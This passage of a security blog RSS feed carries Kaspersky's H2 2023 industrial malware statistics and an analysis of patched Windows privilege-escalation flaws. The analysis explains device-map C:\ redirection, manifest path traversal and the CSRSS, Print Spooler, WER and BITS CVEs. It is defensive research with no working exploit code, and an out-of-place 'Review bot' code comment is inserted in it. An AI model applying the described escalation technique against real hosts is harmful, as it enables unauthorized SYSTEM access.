  1476. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1477. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1478. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1479. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1480. </item>
  1481. <item>
  1482. <title>Threat landscape for industrial automation systems. H2 2023</title>
  1483. <link></link>
  1484. <comments></comments>
  1485. <dc:creator><![CDATA[Kaspersky ICS CERT]]></dc:creator>
  1486. <pubDate>Tue, 19 Mar 2024 10:00:20 +0000</pubDate>
  1487. <category><![CDATA[Industrial threats]]></category>
  1488. <category><![CDATA[Industrial control systems]]></category>
  1489. <category><![CDATA[Malware Statistics]]></category>
  1490. <category><![CDATA[Miner]]></category>
  1491. <category><![CDATA[Phishing]]></category>
  1492. <category><![CDATA[Ransomware]]></category>
  1493. <category><![CDATA[Spyware]]></category>
  1494. <category><![CDATA[Trojan]]></category>
  1495. <category><![CDATA[Worm]]></category>
  1496. <category><![CDATA[Industrial threats]]></category>
  1497. <guid isPermaLink="false"></guid>
  1499. <description><![CDATA[Kaspersky ICS CERT shares industrial threat statistics for H2 2023: most commonly detected malicious objects, threat sources, threat landscape by industry and region.]]></description>
  1500. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="global-statistics-across-all-threats">Global statistics across all threats</h2>
  1501. <p>In the second half of 2023, the percentage of ICS computers on which malicious objects were blocked decreased by 2.1 pp to 31.9%.</p>
  1502. <div id="attachment_112192" style="width: 991px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112192" class="size-full wp-image-112192" src="" alt="Percentage of ICS computers on which malicious objects were blocked, by half year" width="981" height="392" srcset=" 981w, 300w, 768w, 876w, 740w, 701w, 800w" sizes="(max-width: 981px) 100vw, 981px" /></a><p id="caption-attachment-112192" class="wp-caption-text">Percentage of ICS computers on which malicious objects were blocked, by half year</p></div>
  1503. <h2 id="selected-industries">Selected industries</h2>
  1504. <p>In H2 2023, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked of all industries that we looked at. Oil and Gas was the only industry to see a slight (0.5 pp) increase in the second half of the year.</p>
  1505. <div id="attachment_112193" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112193" class="size-large wp-image-112193" src="" alt="Percentage of ICS computers on which malicious objects were blocked in selected industries" width="1024" height="432" srcset=" 1024w, 300w, 768w, 830w, 740w, 664w, 800w, 1048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112193" class="wp-caption-text">Percentage of ICS computers on which malicious objects were blocked in selected industries</p></div>
  1506. <h2 id="main-threat-sources">Main threat sources</h2>
  1507. <p>The internet, email clients and removable media remained the main sources of threats to computers connected to enterprise OT networks. In the second half of 2023, the percentage of ICS computers on which malicious objects were blocked dropped for each of the main sources.</p>
  1508. <div id="attachment_112194" style="width: 1020px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112194" class="size-full wp-image-112194" src="" alt="Percentage of ICS computers on which malicious objects from various sources were blocked" width="1010" height="388" srcset=" 1010w, 300w, 768w, 911w, 740w, 729w, 800w" sizes="(max-width: 1010px) 100vw, 1010px" /></a><p id="caption-attachment-112194" class="wp-caption-text">Percentage of ICS computers on which malicious objects from various sources were blocked</p></div>
  1509. <h2 id="malicious-object-categories">Malicious object categories</h2>
1510. <p>Malicious objects blocked by Kaspersky products on ICS computers belonged to many categories. In H2 2023, only one category saw an increase over the first half of the year: the percentage of ICS computers on which miner executable files for Windows were blocked grew by a factor of 1.4.</p>
  1511. <div id="attachment_112195" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112195" class="size-large wp-image-112195" src="" alt="Percentage of ICS computers on which the activity of various categories of malicious objects was prevented" width="1024" height="377" srcset=" 1024w, 300w, 768w, 952w, 740w, 761w, 800w, 1452w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112195" class="wp-caption-text">Percentage of ICS computers on which the activity of various categories of malicious objects was prevented</p></div>
  1512. <h2 id="regions">Regions</h2>
  1513. <p>In H2 2023, the percentage of computers on which malicious activity was prevented varied across regions from 38.2% in Africa to 14.8% in Northern Europe. The percentage increased in South Asia, Eastern Europe and Southern Europe.</p>
  1514. <div id="attachment_112196" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112196" class="size-full wp-image-112196" src="" alt="Regions ranked by percentage of ICS computers on which malicious objects were blocked, H2 2023" width="1021" height="581" srcset=" 1021w, 300w, 768w, 615w, 740w, 492w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112196" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious objects were blocked, H2 2023</p></div>
  1515. <h3 id="africa">Africa</h3>
  1516. <p><strong>Africa leads the region rankings</strong></p>
  1517. <ul>
  1518. <li>By percentage of ICS computers where malicious objects were blocked (all threats).</li>
  1519. <li>By percentage of ICS computers on which <strong>spyware</strong> was blocked.
  1520. <div id="attachment_112197" style="width: 1033px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112197" class="size-full wp-image-112197" src="" alt="Regions ranked by percentage of ICS computers on which spyware was blocked, H2 2023" width="1023" height="593" srcset=" 1023w, 300w, 768w, 604w, 740w, 483w, 800w" sizes="(max-width: 1023px) 100vw, 1023px" /></a><p id="caption-attachment-112197" class="wp-caption-text">Regions ranked by percentage of ICS computers on which spyware was blocked, H2 2023</p></div></li>
  1521. <li>By percentage of ICS computers on which <strong>worms</strong> were blocked.
  1522. <div id="attachment_112198" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112198" class="size-full wp-image-112198" src="" alt="Regions ranked by percentage of ICS computers on which worms were blocked, H2 2023" width="1016" height="595" srcset=" 1016w, 300w, 768w, 598w, 740w, 478w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112198" class="wp-caption-text">Regions ranked by percentage of ICS computers on which worms were blocked, H2 2023</p></div></li>
  1523. <li>By percentage of ICS computers on which <strong>web miners</strong> were blocked.
  1524. <div id="attachment_112199" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112199" class="size-full wp-image-112199" src="" alt="Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023" width="1021" height="595" srcset=" 1021w, 300w, 768w, 601w, 740w, 480w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112199" class="wp-caption-text">Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023</p></div></li>
1525. <li>By percentage of ICS computers on which <strong>removable media</strong> threats were blocked.
  1526. <div id="attachment_112200" style="width: 1023px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112200" class="size-full wp-image-112200" src="" alt="Regions ranked by percentage of ICS computers on which removable media threats were blocked, H2 2023" width="1013" height="616" srcset=" 1013w, 300w, 768w, 330w, 576w, 740w, 460w, 800w" sizes="(max-width: 1013px) 100vw, 1013px" /></a><p id="caption-attachment-112200" class="wp-caption-text">Regions ranked by percentage of ICS computers on which removable media threats were blocked, H2 2023</p></div></li>
  1527. </ul>
  1528. <h3 id="southern-europe">Southern Europe</h3>
  1529. <ul>
1530. <li><strong>Leads</strong> the regions by percentage of ICS computers on which email threats (<strong>malicious email attachments and phishing links</strong>) were blocked.
  1531. <div id="attachment_112201" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112201" class="size-full wp-image-112201" src="" alt="Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023" width="1021" height="615" srcset=" 1021w, 300w, 768w, 330w, 581w, 740w, 465w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112201" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023</p></div></li>
  1532. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>malicious documents</strong> were blocked.</li>
  1533. <li>One of the two regions where the percentage of ICS computers on which <strong>spyware</strong> was blocked rose in the six-month period.</li>
  1534. </ul>
  1535. <h3 id="eastern-europe">Eastern Europe</h3>
  1536. <ul>
1537. <li>Saw the largest <strong>increase in the percentage</strong> of ICS computers on which malicious objects were blocked among all regions in H2 2023: <strong>6 pp.</strong></li>
  1538. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>malicious scripts and phishing pages were blocked</strong>.</li>
  1539. <li>In the six-month period, the <strong>region saw a rise in the percentage</strong> of ICS computers on which the following were blocked:
  1540. <ul>
  1541. <li><strong>Malicious scripts and phishing pages: </strong>by 2.9 pp</li>
  1542. <li><strong>Miner executable files for Windows: </strong>by 0.9 pp</li>
  1543. <li><strong>Worms</strong>: by 0.43 pp (the only region where this percentage rose)</li>
  1544. <li><strong>Denylisted internet resources</strong>: by 0.4 pp (the only region where this percentage rose).</li>
  1545. </ul>
  1546. </li>
  1547. </ul>
  1548. <h3 id="russia">Russia</h3>
  1549. <ul>
  1550. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>miners in the form of executable files for Windows</strong> were blocked.</li>
  1551. </ul>
  1552. <h3 id="central-asia">Central Asia</h3>
  1553. <ul>
  1554. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>denylisted internet resources</strong> were blocked.
  1555. <div id="attachment_112202" style="width: 1021px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112202" class="size-full wp-image-112202" src="" alt="Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023" width="1011" height="606" srcset=" 1011w, 300w, 768w, 584w, 740w, 467w, 800w" sizes="(max-width: 1011px) 100vw, 1011px" /></a><p id="caption-attachment-112202" class="wp-caption-text">Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023</p></div></li>
  1556. <li><strong>Leads</strong> by percentage of ICS computers on which <strong>miners in the form of executable files for Windows</strong> were blocked.
  1557. <div id="attachment_112203" style="width: 1033px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112203" class="size-full wp-image-112203" src="" alt="Regions ranked by percentage of ICS computers on which miners in the form of executable files for Windows were blocked, H2 2023" width="1023" height="626" srcset=" 1023w, 300w, 768w, 572w, 740w, 458w, 800w" sizes="(max-width: 1023px) 100vw, 1023px" /></a><p id="caption-attachment-112203" class="wp-caption-text">Regions ranked by percentage of ICS computers on which miners in the form of executable files for Windows were blocked, H2 2023</p></div></li>
  1558. <li><strong>Second among the regions</strong> by percentage of ICS computers on which <strong>worms</strong> were blocked.</li>
  1559. </ul>
  1560. <h3 id="east-asia">East Asia</h3>
  1561. <ul>
  1562. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>malware for AutoCAD</strong> was blocked.</li>
  1563. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>viruses</strong> were blocked.</li>
  1564. <li><strong>Spyware ranked second in the region</strong> among all malware categories by percentage of ICS computers on which it was blocked.</li>
  1565. </ul>
  1566. <h3 id="south-east-asia">South-East Asia</h3>
  1567. <ul>
  1568. <li><strong>Leader</strong> among the regions by percentage of ICS computers on which <strong>viruses</strong> were blocked.
  1569. <div id="attachment_112204" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112204" class="size-full wp-image-112204" src="" alt="Regions ranked by percentage of ICS computers on which viruses were blocked, H2 2023" width="1016" height="594" srcset=" 1016w, 300w, 768w, 599w, 740w, 479w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112204" class="wp-caption-text">Regions ranked by percentage of ICS computers on which viruses were blocked, H2 2023</p></div></li>
  1570. <li><strong>Viruses ranked third in the region </strong>among all malware categories by percentage of ICS computers on which they were blocked.</li>
  1571. </ul>
  1572. <h3 id="south-asia">South Asia</h3>
  1573. <ul>
  1574. <li><strong>Leader</strong> (along with the Middle East) among the regions by percentage of ICS computers on which <strong>ransomware</strong> was blocked.
  1575. <div id="attachment_112205" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112205" class="size-full wp-image-112205" src="" alt="Regions ranked by percentage of ICS computers on which ransomware was blocked, H2 2023" width="1016" height="599" srcset=" 1016w, 300w, 768w, 594w, 740w, 475w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112205" class="wp-caption-text">Regions ranked by percentage of ICS computers on which ransomware was blocked, H2 2023</p></div></li>
  1576. </ul>
  1577. <h3 id="middle-east">Middle East</h3>
  1578. <ul>
  1579. <li><strong>Leads</strong> (together with South Asia) the regions by percentage of ICS computers on which <strong>ransomware</strong> was blocked.</li>
  1580. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>spyware</strong> was blocked.</li>
  1581. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>web miners</strong> were blocked.</li>
  1582. </ul>
  1583. <h3 id="latin-america">Latin America</h3>
  1584. <ul>
  1585. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>malicious scripts and phishing pages</strong> were blocked.
  1586. <div id="attachment_112206" style="width: 1027px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112206" class="size-full wp-image-112206" src="" alt="Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023" width="1017" height="621" srcset=" 1017w, 300w, 768w, 573w, 740w, 459w, 800w" sizes="(max-width: 1017px) 100vw, 1017px" /></a><p id="caption-attachment-112206" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023</p></div></li>
  1587. <li><strong>Leader</strong> by percentage of ICS computers on which <strong>malicious documents</strong> were blocked.
  1588. <div id="attachment_112207" style="width: 1024px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112207" class="size-full wp-image-112207" src="" alt="Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023" width="1014" height="591" srcset=" 1014w, 300w, 768w, 601w, 740w, 480w, 800w" sizes="(max-width: 1014px) 100vw, 1014px" /></a><p id="caption-attachment-112207" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023</p></div></li>
<li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>malicious email attachments and phishing links</strong> were blocked.</li>
  1590. </ul>
  1591. <h3 id="australia-and-new-zealand">Australia and New Zealand</h3>
  1592. <ul>
  1593. <li>The only region where the percentage of ICS computers on which <strong>malicious documents</strong> were blocked rose in the six-month period.</li>
  1594. </ul>
  1595. <p>The full report <a href=";utm_medium=link&amp;utm_campaign=threat-landscape-for-industrial-automation-systems-statistics-for-h2-2023" target="_blank" rel="noopener">is available</a> on the Kaspersky ICS CERT website.</p>
  1596. ]]></content:encoded>
  1597. <wfw:commentRss></wfw:commentRss>
  1598. <slash:comments>0</slash:comments>
  1599. <media:content xmlns:media="" url="" width="1200" height="800"><media:keywords>full</media:keywords></media:content>
  1600. <media:content xmlns:media="" url="" width="1024" height="683"><media:keywords>large</media:keywords></media:content>
  1601. <media:content xmlns:media="" url="" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  1602. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1603. </item>
  1604. <item>
  1605. <title>A patched Windows attack surface is still exploitable</title>
  1606. <link></link>
  1607. <comments></comments>
  1608. <dc:creator><![CDATA[Elsayed Elrefaei, Ashraf Refaat, Kaspersky GERT]]></dc:creator>
  1609. <pubDate>Thu, 14 Mar 2024 10:00:24 +0000</pubDate>
  1610. <category><![CDATA[SOC, TI and IR posts]]></category>
  1611. <category><![CDATA[Microsoft Windows]]></category>
  1612. <category><![CDATA[Vulnerabilities]]></category>
  1613. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1614. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1615. <guid isPermaLink="false"></guid>
  1617. <description><![CDATA[In this report, we highlight the key points about a class of recently-patched elevation-of-privilege vulnerabilities affecting Microsoft Windows, and then focus on how to check if any of them have been exploited or if there have been any attempts to exploit them.]]></description>
  1618. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On August 8, 2023, Microsoft finally <a href="" target="_blank" rel="noopener">released</a> a kernel patch for a class of vulnerabilities affecting Microsoft Windows since <a href="" target="_blank" rel="noopener">2015</a>. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a <a href="" target="_blank" rel="noopener">2015</a> blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive. More than five months after the patches for these vulnerabilities were released, we&#8217;re still seeing some of their exploits in the wild because it&#8217;s a very easy way to get a quick <strong>NT AUTHORITY\SYSTEM</strong> and that&#8217;s why it may be favored by well-known threat actors.</p>
<p>We discussed these findings at the BlackHat MEA conference in November 2023. In December 2023 and January 2024, we found two exploits that could still use this attack surface on unpatched versions of Windows. Both exploits are packed with UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero <a href="" target="_blank" rel="noopener">PoC sample</a>. The other sample was a packed version of an <a href="" target="_blank" rel="noopener">SSD Secure Disclosure</a> public PoC, even using the same named pipe <strong>&#8220;\\\\.\\Pipe\\TyphoonPWN&#8221;</strong> without modifications. The PDB paths for both samples are:</p>
  1620. <ul>
  1621. <li>C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb</li>
  1622. <li>C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb</li>
  1623. </ul>
  1624. <p>Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface.</p>
  1625. <p>Affected processes and services include native Windows services that run by default on most versions of the operating system. These include:</p>
  1626. <ul>
  1627. <li>CSRSS</li>
  1628. <li>Windows Error Reporting (WER)</li>
  1629. <li>File history service</li>
<li>Background Intelligent Transfer Service (BITS)</li>
  1631. <li>Print Spooler</li>
  1632. </ul>
  1633. <div id="attachment_112246" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112246" class="size-large wp-image-112246" src="" alt="Vulnerable Windows processes and services" width="1024" height="401" srcset=" 1024w, 300w, 768w, 1536w, 893w, 740w, 714w, 800w, 1946w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112246" class="wp-caption-text">Vulnerable Windows processes and services</p></div>
<p>The exploits targeting this attack surface share a common pattern:</p>
<ul>
<li>A DLL that is loaded by a process running at system integrity.</li>
<li>That DLL has an isolation-aware manifest, so its dependencies are resolved through a side-by-side activation context.</li>
<li>The ability to redirect the C:\ root to a writable directory via a symbolic link in the caller&#8217;s device map.</li>
</ul>
  1640. <h2 id="csrss-cve-2022-22047">CSRSS | CVE-2022-22047</h2>
<p>This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It is one of the CVEs that were actively exploited by the threat actor tracked as <a href="" target="_blank" rel="noopener">KNOTWEED | Denim Tsunami</a>.</p>
  1642. <p>Reversing the in-the-wild exploit for the CVE-2022-22047 shows:</p>
  1643. <ul>
  1644. <li>The exploit crafts a call into CSRSS.</li>
  1645. <li>The call requests an activation context for a privileged executable and specifies a malicious manifest.<br />
  1646. <a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112247" src="" alt="" width="1024" height="570" srcset=" 1024w, 300w, 768w, 270w, 629w, 740w, 503w, 800w, 1146w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></li>
  1647. <li>The manifest uses an undocumented manifest XML attribute named <strong>loadFrom</strong>. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive.<br />
  1648. <a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112248" src="" alt="" width="717" height="420" srcset=" 717w, 300w, 598w, 478w" sizes="(max-width: 717px) 100vw, 717px" /></a></li>
  1649. </ul>
  1650. <p>Here is <a href="" target="_blank" rel="noopener">a detailed blog post</a> by ZDI explaining CSRSS Cache Poisoning.</p>
  1651. <h2 id="csrss-cve-2022-37989">CSRSS | CVE-2022-37989</h2>
<p>The second CSRSS cache poisoning vulnerability was a bypass of the patch for CVE-2022-22047. After the undocumented <strong>loadFrom</strong> attribute was blocked, another attribute could still be abused to load a manifest file from a user-controlled path: declaring a dependent assembly with path traversal in its <strong>name</strong> attribute.</p>
  1653. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112249" src="" alt="" width="1024" height="503" srcset=" 1024w, 300w, 768w, 713w, 740w, 570w, 800w, 1143w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1654. <p>The patch for the CVE-2022-37989 was simple: check if the <strong>name</strong> attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE <a href="" target="_blank" rel="noopener">was discovered</a> by ZDI.</p>
  1655. <h2 id="print-spooler-cve-2022-29104">Print Spooler | CVE-2022-29104</h2>
  1656. <p>Print Spooler is a service that runs by default in almost all versions of Windows. It&#8217;s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it&#8217;s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to <a href="" target="_blank" rel="noopener">VirusTotal</a>.</p>
  1657. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112250" src="" alt="" width="1024" height="218" srcset=" 1024w, 300w, 768w, 1536w, 740w, 1312w, 800w, 1589w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1658. <p>Fake C:\ drive structure:</p>
  1659. <ul>
  1660. <li>C:\<strong>Imprint</strong>\Windows\system32</li>
  1661. <li>C:\<strong>Imprint</strong>\Windows\WinSxS</li>
  1662. </ul>
  1663. <p>All folders inside the Imprint folder are writable, allowing an attacker to control their contents.</p>
  1664. <p>Path traversal is added to &#8220;AssemblyIdentity&#8221; to point to the Imprint writable path.</p>
  1665. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112251" src="" alt="" width="1024" height="286" srcset=" 1024w, 300w, 768w, 1251w, 740w, 1001w, 800w, 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1666. <p>The vulnerability analysis shows that:</p>
  1667. <ul>
<li>An attacker can remap the root drive (C:\) for privileged processes for the duration of impersonation.</li>
<li>While a thread impersonates a user, file accesses are resolved through the DOS device map of the impersonated user&#8217;s logon session rather than the system device map.</li>
  1670. <li>CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder <strong>C:\Windows\WinSxS.</strong></li>
  1671. <li>The WinSxS folder stores multiple copies of system files and components.</li>
  1672. <li>The WinSxS folder provides a central location for storing different versions of system files that are shared by multiple applications and processes.</li>
  1673. <li>The WinSxS folder provides system stability and compatibility by allowing different applications to use the specific versions of files they need.</li>
  1674. <li>WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL.</li>
  1675. </ul>
  1676. <p>The Windows operating system uses the application manifest to determine which version is appropriate for which app.</p>
  1677. <p>The application manifest is stored in XML format and describes:</p>
  1678. <ul>
  1679. <li>The dependencies associated with the application.</li>
  1680. <li>What permissions the application requires.</li>
  1681. <li>What compatibility settings the application supports.</li>
  1682. </ul>
<p>A CSRSS mitigation was enabled for <strong>spoolsv.exe</strong> and <strong>printfilterpipelinesvc.exe</strong>: impersonation is stopped while external resources are loaded and resumed once the load completes.</p>
  1684. <h2 id="print-spooler-cve-2022-41073">Print Spooler | CVE-2022-41073</h2>
  1685. <p>After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of <strong>prntvpt.dll </strong>that is loaded by Print Spooler.</p>
  1686. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112252" src="" alt="" width="1024" height="318" srcset=" 1024w, 300w, 768w, 1126w, 740w, 901w, 800w, 1399w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
<p>According to <a href="" target="_blank" rel="noopener">Project Zero</a>, besides the mitigation added to CSRSS, the patch simply stopped any impersonation prior to the <strong>LoadLibraryExW</strong> call in <strong>winspool!LoadNewCopy</strong> and resumed it afterwards.</p>
<p>The patched code around the <strong>LoadLibraryExW</strong> call:</p><pre class="crayon-plain-tag">+ if (RevertToProcess(&amp;TokenHandle, x) &gt;= 0) {
  1689.  lib = LoadLibraryExW(arg1, 0, dwFlags);
  1690. +   ResumeImpersonation(TokenHandle);
  1691. + }</pre><p>
In addition, NtOpenFile is called with the <strong>OBJ_IGNORE_IMPERSONATED_DEVICEMAP</strong> flag, so external resources loaded through LoadNewCopy are resolved without the impersonated device map. Either way, the privileged process no longer follows the fake root set up by the medium-integrity process: it resolves C:\ through the original system drive and therefore does not load untrusted or malicious resources.</p>
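Review bot: the hunk gives RevertToProcess no failure path. If reverting impersonation fails, LoadLibraryExW is skipped and lib keeps whatever it held before the if, so the caller should receive an explicit failure (for example an else branch that sets lib to NULL and records the error) rather than an unchanged variable that may still look like a valid module handle.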
  1693. <h2 id="windows-error-reporting-cve-2023-36874">Windows Error Reporting | CVE-2023-36874</h2>
<p>Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause of CVE-2023-36874 is the CreateProcess call made when a crash is handled: under impersonation, CreateProcess follows the fake root, so the privileged WER service creates a process from an executable in the writable fake root, leading to privilege escalation.</p>
<p>CVE-2023-36874 was exploited in the wild and has several published <a href="" target="_blank" rel="noopener">PoCs</a>. The exploit interacts with the IWerReport COM interface and calls SubmitReport; this leads to UtilLaunchWerManager, which calls CreateProcess. It is this CreateProcess call that is vulnerable to DOS device map modification.</p>
  1696. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112253" src="" alt="" width="889" height="74" srcset=" 889w, 300w, 768w, 740w, 800w" sizes="(max-width: 889px) 100vw, 889px" /></a></p>
<p>Once the exploit submits a fake crash report, the service ends up calling the vulnerable CreateProcess API.</p>
  1698. <h2 id="file-history-service-cve-2023-35359">File History Service | CVE-2023-35359</h2>
<p>File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then, still under impersonation, loads a DLL called <strong>fhcfg.dll</strong>. This DLL has an isolation-aware manifest that pulls in another dependency, msasn1.dll. <a href="" target="_blank" rel="noopener">The exploit</a> starts with the usual technique of redirecting the C:\ root to a fake writable root.</p>
  1700. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112254" src="" alt="" width="1024" height="511" srcset=" 1024w, 300w, 768w, 702w, 740w, 561w, 800w, 1193w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
<h2 id="windows-error-reporting-2nd-exploit-cve-2023-35359">Windows Error Reporting – 2<sup>nd</sup> exploit | CVE-2023-35359</h2>
<p>The first Windows Error Reporting vulnerability, in which the privileged WER service called CreateProcess and followed the fake root, was patched by switching the service to CreateProcessAsUser. After that patch, adversaries found another route that could lead to CreateProcess being used again under certain conditions, which was treated as a new vulnerability. For example, if the WER service is marked as disabled on a system and a privileged process impersonating a medium-integrity user hits an unhandled exception during impersonation, the resulting crash tries to enable the WER service for reporting. <a href="" target="_blank" rel="noopener">The detailed analysis for this CVE</a> shows that it does not appear to be exploitable.</p>
  1703. <div id="attachment_112255" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112255" class="size-large wp-image-112255" src="" alt="The exploitation of CVE-2023-35359" width="1024" height="578" srcset=" 1024w, 300w, 768w, 1536w, 620w, 740w, 496w, 800w, 1940w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112255" class="wp-caption-text">The exploitation of CVE-2023-35359</p></div>
  1704. <h2 id="bits-cve-2023-35359">BITS | CVE-2023-35359</h2>
<p>The Background Intelligent Transfer Service (BITS) facilitates asynchronous, prioritized file transfers between a client and a server. BITS operates in the background, so it can perform file transfers without interrupting the user or consuming all of the available network bandwidth.</p>
<p>You may notice that the CVE number, CVE-2023-35359, is the same for the last three issues: in the final patch Microsoft assigned a single CVE to all vulnerabilities of this type. So these are different vulnerabilities in different processes and services, but they share one CVE number.</p>
